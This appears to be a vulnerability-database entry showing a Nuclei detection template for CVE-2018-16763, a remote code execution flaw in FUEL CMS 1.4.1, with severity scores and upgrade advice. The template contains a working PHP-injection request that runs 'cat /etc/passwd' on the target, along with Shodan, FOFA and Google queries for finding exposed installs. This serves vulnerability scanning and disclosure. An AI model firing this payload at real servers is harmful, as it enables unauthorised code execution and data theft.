Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-16763
HistorySep 06, 2020 - 5:22 p.m.

FUEL CMS 1.4.1 - Remote Code Execution

2020-09-0617:22:32
ProjectDiscovery
github.com
15
cve
cve2018
fuelcms
rce
edb
thedaylightstudio
php
evaluation
parameters
patch
vulnerability
upgrade
exploit
severity
remediation
attack
arbitrary code
compromise
server
security

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.871

Percentile

98.7%

FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter.

id: CVE-2018-16763

info:
  name: FUEL CMS 1.4.1 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system, leading to complete compromise of the application and potentially the underlying server.
  remediation: |
    Upgrade to FUEL CMS version 1.4.2 or later, which includes a patch for this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/47138
    - https://www.getfuelcms.com/
    - https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16763
    - https://github.com/daylightstudio/FUEL-CMS/issues/478
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-16763
    cwe-id: CWE-74
    epss-score: 0.79227
    epss-percentile: 0.98278
    cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: thedaylightstudio
    product: fuel_cms
    shodan-query: http.title:"fuel cms"
    fofa-query: title="fuel cms"
    google-query: intitle:"fuel cms"
  tags: cve,cve2018,fuelcms,rce,edb,thedaylightstudio

http:
  - raw:
      - |
        GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402204094d65babc7f0b5c8c10d59b17d51f9ce5a347b0e0a86a8b1f4d4b26623b06202204860bf57ffcc49976f3017bfba65e702e9b416919b8f7e5bd18ad345625f0285:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.871

Percentile

98.7%